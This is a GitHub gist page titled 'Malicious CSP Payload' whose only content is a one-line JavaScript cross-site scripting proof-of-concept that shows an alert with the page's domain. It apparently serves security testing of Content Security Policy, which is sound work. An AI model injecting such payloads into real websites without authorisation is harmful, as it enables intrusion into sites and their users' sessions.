Skip to content

Instantly share code, notes, and snippets.

@abhaybhargav
Created June 10, 2022 02:05
Show Gist options
  • Save abhaybhargav/429d5a2d40572b37191efb4f648b9788 to your computer and use it in GitHub Desktop.
Save abhaybhargav/429d5a2d40572b37191efb4f648b9788 to your computer and use it in GitHub Desktop.
Malicious CSP Payload
alert('this is a xss attack ' + document.domain)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment